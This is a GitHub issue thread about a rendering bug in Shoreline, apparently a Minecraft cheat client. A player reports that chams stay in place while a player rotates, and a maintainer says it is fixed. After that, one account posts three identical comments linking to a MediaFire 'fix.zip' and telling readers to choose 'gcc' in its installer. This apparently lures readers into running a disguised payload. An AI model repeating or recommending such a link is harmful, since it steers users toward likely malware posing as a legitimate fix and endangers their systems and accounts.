### ISSUE TITLE
chams issue when player is rotating

### ISSUE THREAD

**Issue by Flickz1337** [ShorelineLLC/issues#2]
**Describe the bug**
look at the screenshot

**To Reproduce**
1. connect to crystalpvp.cc
2. turn on autocrystal
3. look how the player rotates but the chams stay in place
4. boom

**Expected behavior**
chams being silly

**Screenshots**
![image](https://github.com/user-attachments/assets/2e8f8ea2-de44-4840-abb0-52f2e64e4d53)

**Environment (please complete the following information):**
doesnt matter

**Additional context**
pls fix shoreline developers D:

**Comment by pastimee** [comment]
Fixed in 2d72383

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
